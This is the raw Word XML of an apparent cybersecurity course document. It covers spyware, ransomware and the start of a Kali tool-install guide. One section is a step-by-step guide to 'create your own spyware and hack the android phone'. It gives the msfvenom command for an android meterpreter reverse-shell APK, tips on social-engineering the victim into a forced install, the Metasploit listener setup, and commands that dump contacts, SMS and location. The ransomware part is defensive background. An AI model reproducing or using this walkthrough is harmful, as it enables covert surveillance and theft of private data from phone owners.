    <w:p w14:paraId="511AE59E" w14:textId="5D289656" w:rsidR="008C082C" w:rsidRPr="002C7722"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By implementing these preventive measures and maintaining a proactive approach to cybersecurity, you can significantly reduce the risk of falling victim to spyware and protect your sensitive information from unauthorized access and misuse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38392A74" w14:textId="77777777" w:rsidR="00A02BD7" w:rsidRPr="002C7722" w:rsidRDefault="00A02BD7" w:rsidP="00A02BD7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="225" w:after="300" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>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Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="041E82DB"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">We have already discussed the Metasploit framework,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msfvenom</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is a utility used to generate shell scripts that are part of Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218EAF74" w14:textId="77777777" w:rsidR="00A02BD7" w:rsidRPr="002C7722" w:rsidRDefault="00A02BD7" w:rsidP="00A02BD7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="225" w:after="300" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>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Kali Linux machine IP Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EDA8D7"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Change the network mode to the bridge. Now the VM machine connected to your network comes in the common network as that of the phone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7326AF"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L HOST</w:t>
      </w:r>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: Listener host, the IP address of attacker machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359FD4AD"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L PORT</w:t>
      </w:r>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: Listener port, the port listening to compromised victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAEC72A" w14:textId="77777777" w:rsidR="00A02BD7" w:rsidRPr="002C7722" w:rsidRDefault="00A02BD7" w:rsidP="00A02BD7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="225" w:after="300" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>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Steps to create your own spyware and hack the android phone:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1B79AF" w14:textId="77777777" w:rsidR="00A02BD7" w:rsidRPr="002C7722" w:rsidRDefault="00A02BD7" w:rsidP="00A02BD7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="225" w:after="300" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="3"/>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Creating a spyware for android</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C183033"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Open your Kali machine terminal and use the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msfvenom</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to create an exploit for the android phone. Use the following command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FDF7A9" w14:textId="77777777" w:rsidR="00A02BD7" w:rsidRPr="002C7722" w:rsidRDefault="00A02BD7" w:rsidP="00A02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msfvenom</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-p android/</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meterpreter</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reverse_tcp</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LHOST=(IP ADDRESS) LPORT=4444 R &gt;</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hackyourphone.apk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7812CDC8" w14:textId="77777777" w:rsidR="00A02BD7" w:rsidRPr="002C7722" w:rsidRDefault="00A02BD7" w:rsidP="00A02BD7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="225" w:after="300" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="3"/>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Deploy the spyware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046D6520" w14:textId="77777777" w:rsidR="00A02BD7" w:rsidRPr="002C7722" w:rsidRDefault="00A02BD7" w:rsidP="00A02B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You can find the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hackd.apk</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in the user directory which is inside your home directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CD2CA7" w14:textId="77777777" w:rsidR="00A02BD7" w:rsidRPr="002C7722" w:rsidRDefault="00A02BD7" w:rsidP="00A02B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The step requires some skills to deploy and install the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apk</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into the victim’s mobile. First you need to send this file to the victim’ mobile phone. Remember Gmail will not allow the file as attachment as it has already detected this as a virus. Either use google drive or host on any system or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url</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to share. The step requires some social engineering skills</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2136ED11" w14:textId="77777777" w:rsidR="00A02BD7" w:rsidRPr="002C7722" w:rsidRDefault="00A02BD7" w:rsidP="00A02B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Even the latest android systems may stop the installation and ask to report the file as it may be dangerous. So forceful installation required here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53317C51" w14:textId="77777777" w:rsidR="00A02BD7" w:rsidRPr="002C7722" w:rsidRDefault="00A02BD7" w:rsidP="00A02B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Once the file is installed, now go back to the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>terminal</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> and use the command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msfconsole</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to open Metasploit framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7B12C8" w14:textId="77777777" w:rsidR="00A02BD7" w:rsidRPr="002C7722" w:rsidRDefault="00A02BD7" w:rsidP="00A02BD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kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="088C56F4"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Open the multi/handler to launch the exploit. Use following commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF08F62" w14:textId="77777777" w:rsidR="00A02BD7" w:rsidRPr="002C7722" w:rsidRDefault="00A02BD7" w:rsidP="00A02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&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B953AE" w14:textId="77777777" w:rsidR="00A02BD7" w:rsidRPr="002C7722" w:rsidRDefault="00A02BD7" w:rsidP="00A02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exploit(handler) &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>set payload android/</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meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/</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reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="65CC1313" w14:textId="77777777" w:rsidR="00A02BD7" w:rsidRPr="002C7722" w:rsidRDefault="00A02BD7" w:rsidP="00A02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exploit(handler) &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>set LHOST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ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> address)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6104AA13" w14:textId="77777777" w:rsidR="00A02BD7" w:rsidRPr="002C7722" w:rsidRDefault="00A02BD7" w:rsidP="00A02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exploit(handler) &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFD8381" w14:textId="77777777" w:rsidR="00A02BD7" w:rsidRPr="002C7722" w:rsidRDefault="00A02BD7" w:rsidP="00A02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msf</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exploit(handler) &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAAB538"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When user opens the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>app</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> the exploit will start doing its job and BOOM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F6F884" w14:textId="77777777" w:rsidR="00A02BD7" w:rsidRPr="002C7722" w:rsidRDefault="00A02BD7" w:rsidP="00A02BD7">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Now you can try some of these commands to dump data from the phone:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA8AB42" w14:textId="77777777" w:rsidR="00A02BD7" w:rsidRPr="002C7722" w:rsidRDefault="00A02BD7" w:rsidP="00A02B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dump_contacts</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Extract all the contacts from the phone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BECB81" w14:textId="77777777" w:rsidR="00A02BD7" w:rsidRPr="002C7722" w:rsidRDefault="00A02BD7" w:rsidP="00A02B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lastRenderedPageBreak/>
        <w:t>geolocate</w:t>
      </w:r>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: Used to locate the lost phone but only if the malicious file is installed on that device.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79920D78" w14:textId="77777777" w:rsidR="00A02BD7" w:rsidRPr="002C7722" w:rsidRDefault="00A02BD7" w:rsidP="00A02B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dump_sms</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Get the messages from the device.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C59FEC" w14:textId="3BD59018"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Ransomware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178ECFAD"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Ransomware: Understanding the Threat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC1E395"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Ransomware is a type of malicious software designed to encrypt files on a victim's computer or network, rendering them inaccessible until a ransom is paid to the attacker. It has emerged as one of the most significant cybersecurity threats, causing substantial financial losses and disruptions for individuals and organizations worldwide. Understanding the workings of ransomware is crucial for effectively preventing and mitigating its impact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1544ACC3" w14:textId="77777777" w:rsidR="008C082C" w:rsidRPr="008C082C" w:rsidRDefault="008C082C" w:rsidP="008C082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Infection Vectors: How Ransomware Spreads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A48252"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Ransomware can infect systems through various vectors, exploiting vulnerabilities or relying on social engineering tactics to gain access. Here are some common infection vectors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70283038"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a) Phishing Emails: Attackers often distribute ransomware through phishing emails, masquerading as legitimate communications. These emails contain malicious attachments or links that, when clicked, initiate the download and execution of ransomware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CEC988"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 xml:space="preserve">b) Malicious Websites and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C082C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Malvertising</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C082C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: Visiting compromised websites or clicking on malicious ads can trigger drive-by downloads, where ransomware is automatically downloaded and executed without the user's knowledge or consent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2816438B"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c) Exploit Kits: Attackers leverage exploit kits, which are prepackaged sets of software vulnerabilities, to exploit security weaknesses in outdated software or plugins. Successful exploitation can lead to ransomware installation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7929FCDD"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d) Remote Desktop Protocol (RDP) Attacks: Attackers target systems with weak or default RDP credentials, gaining unauthorized access to the network and deploying ransomware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD6B487" w14:textId="77777777" w:rsidR="008C082C" w:rsidRPr="008C082C" w:rsidRDefault="008C082C" w:rsidP="008C082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Encryption and Ransom: How Ransomware Operates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D87DD3"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Once ransomware infects a system, it initiates a process to encrypt files, rendering them inaccessible to the victim. Here's an overview of the typical steps involved:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015FFF3E"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a) File Encryption: Ransomware uses strong encryption algorithms to encrypt files on the victim's computer or network, making them unreadable without the decryption key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACF9D1A"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b) Ransom Note: After encryption, the ransomware displays a ransom note, informing the victim about the attack and providing instructions on how to pay the ransom. The note often includes threats of permanent data loss or increased ransom amounts if the payment is not made within a specified time frame.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CAD565"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c) Crypto Currencies and Payment: Attackers typically demand payment in cryptocurrencies like Bitcoin, which offers a level of anonymity. They provide instructions on how to make the payment and often create a unique payment address for each victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25697F06"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lastRenderedPageBreak/>
        <w:t>d) Decryption Key: Upon receiving the ransom payment, attackers may provide a decryption key to unlock the encrypted files. However, there's no guarantee that paying the ransom will result in the recovery of the data, as some attackers may fail to provide the key or demand additional payments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0749C7" w14:textId="77777777" w:rsidR="008C082C" w:rsidRPr="008C082C" w:rsidRDefault="008C082C" w:rsidP="008C082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Impact and Consequences: The Damage Caused by Ransomware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA659E5"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Ransomware attacks can have severe consequences for individuals and organizations alike. Here are some of the key impacts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D370BE"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a) Financial Losses: Ransom payments, potential legal fees, and costs associated with remediation efforts can result in significant financial losses for victims.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65991EF5"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b) Data Loss and Disruption: Encrypted files become inaccessible, leading to data loss and operational disruptions. For businesses, this can lead to downtime, reduced productivity, and reputational damage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E459976"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 xml:space="preserve">c) Reputational Damage: Ransomware attacks can undermine customer trust and confidence in an organization's ability to protect their data. Public disclosure of an attack can </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008C082C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>harm</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008C082C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> an organization's reputation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1D1265"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d) Regulatory Compliance Issues: Organizations that handle sensitive data may face legal and regulatory compliance issues if they experience a ransomware attack. Failure to protect data adequately can result in fines and legal repercussions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69576DF4" w14:textId="77777777" w:rsidR="008C082C" w:rsidRPr="008C082C" w:rsidRDefault="008C082C" w:rsidP="008C082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Protecting Against Ransomware:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A220B7F"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Prevention and preparedness are key to mitigating the impact of ransomware attacks. Here are some essential measures for protecting against ransomware:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671FE984"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a) Regular Backups: Maintain offline and encrypted backups of critical data. Regularly test the restoration process to ensure data integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4E59C0"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b) Patching and Updates: Keep operating systems, software, and plugins up to date with the latest security patches to address vulnerabilities that ransomware can exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED5EAB3"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c) Security Software: Install and regularly update reputable antivirus and antimalware software to detect and block ransomware threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F99A799"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d) User Education: Train users to recognize and avoid phishing emails, suspicious links, and malicious attachments. Encourage a security-conscious culture within the organization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BF78DE"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e) Network Segmentation: Implement network segmentation to contain the spread of ransomware and limit the potential damage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608C9FC8"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f) Incident Response Plan: Develop a robust incident response plan that includes steps for isolating infected systems, notifying appropriate stakeholders, and engaging with law enforcement if necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDAB245"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lastRenderedPageBreak/>
        <w:t>By implementing these preventive measures and adopting a proactive approach to cybersecurity, individuals and organizations can significantly reduce the risk of falling victim to ransomware and minimize the impact of an attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F5C926" w14:textId="77777777" w:rsidR="008C082C" w:rsidRPr="008C082C" w:rsidRDefault="008C082C" w:rsidP="008C0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8C082C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Remember, vigilance and preparedness are crucial in defending against the evolving threat landscape of ransomware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5D8E74" w14:textId="77777777" w:rsidR="008C082C" w:rsidRPr="002C7722" w:rsidRDefault="008C082C"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p>
    <w:p w14:paraId="73951911"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Step #1: Download and Install the Binaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EF9697"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br/>
        <w:t xml:space="preserve">The first step is to fire up your Kali and make certain that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golang</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is installed. If not, download it from the Kali repositories by entering;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3770EA9C"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 xml:space="preserve">kali &gt;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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> apt install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golang</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="01E52EA7"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br/>
        <w:t>Next, you will need to login to the root user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503B7730"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 xml:space="preserve">kali &gt;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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">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su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145840F6"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Now create a directory for the binaries. In this case, I named it simply "git".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C0E3A7"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kali &gt;</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mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEA3FAE"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Next, change directory (cd) to this directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4799D106"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kali &gt; cd git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F4B2B6"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Next, download the binaries from </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="002C7722">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>github.com.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3078E0A9"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 xml:space="preserve">kali &gt; git clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="002C7722">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
